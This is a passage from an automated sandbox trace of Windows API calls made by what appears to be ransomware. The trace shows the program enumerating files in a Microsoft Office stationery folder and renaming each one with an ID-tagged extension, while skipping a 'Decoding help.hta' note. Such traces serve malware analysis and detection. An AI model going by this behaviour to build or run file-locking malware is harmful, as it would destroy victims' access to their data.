Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.770] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.770] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="HandPrints.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" [0044.770] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" [0044.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0044.771] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.771] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5192b38, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5192b38, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4480f815, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x252ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Memo.emf", cAlternateFileName="")) returned 1 [0044.771] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.771] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.771] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Memo.emf") returned -1 [0044.771] lstrlenW (lpString="Memo.emf") returned 8 [0044.771] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.771] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Memo.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" [0044.771] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" [0044.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf.[ID]g9uZrLhJaygpwRm1[ID]" [0044.771] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.771] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4e4cd3a, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4e4cd3a, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44835973, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Monet.jpg", cAlternateFileName="")) returned 1 [0044.771] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.771] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.772] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Monet.jpg") returned -1 [0044.772] lstrlenW (lpString="Monet.jpg") returned 9 [0044.772] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.772] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Monet.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" [0044.772] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" [0044.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0044.772] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.772] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc51dedf2, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc51dedf2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x448cdeeb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1060, dwReserved0=0x0, dwReserved1=0x0, cFileName="Month_Calendar.emf", cAlternateFileName="")) returned 1 [0044.772] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.772] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.772] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.772] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Month_Calendar.emf") returned -1 [0044.772] lstrlenW (lpString="Month_Calendar.emf") returned 18 [0044.772] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.772] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Month_Calendar.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" [0044.772] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" [0044.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf.[ID]g9uZrLhJaygpwRm1[ID]" [0044.772] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.773] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc522b0ac, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc522b0ac, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x448cdeeb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x65b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.emf", cAlternateFileName="")) returned 1 [0044.773] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.773] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.773] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.773] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Music.emf") returned -1 [0044.773] lstrlenW (lpString="Music.emf") returned 9 [0044.773] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.773] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.773] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Music.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" [0044.773] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" [0044.773] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf.[ID]g9uZrLhJaygpwRm1[ID]" [0044.773] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.773] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ebf151, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ebf151, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44b2f4cb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xb86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notebook.jpg", cAlternateFileName="")) returned 1 [0044.773] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.773] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.773] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.773] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Notebook.jpg") returned -1 [0044.773] lstrlenW (lpString="Notebook.jpg") returned 12 [0044.773] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.773] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.773] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Notebook.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" [0044.774] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" [0044.774] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0044.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.774] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce0e3b3c, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Orange Circles.htm", cAlternateFileName="")) returned 1 [0044.774] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.774] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.774] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.774] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.774] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Orange Circles.htm") returned -1 [0044.774] lstrlenW (lpString="Orange Circles.htm") returned 18 [0044.774] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.774] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.774] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Orange Circles.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" [0044.774] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" [0044.774] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0044.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.774] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce34510c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce34510c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa4cf00d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="OrangeCircles.jpg", cAlternateFileName="")) returned 1 [0044.774] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.774] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.774] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.775] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OrangeCircles.jpg") returned -1 [0044.775] lstrlenW (lpString="OrangeCircles.jpg") returned 17 [0044.775] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.775] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.775] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="OrangeCircles.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" [0044.775] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" [0044.775] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 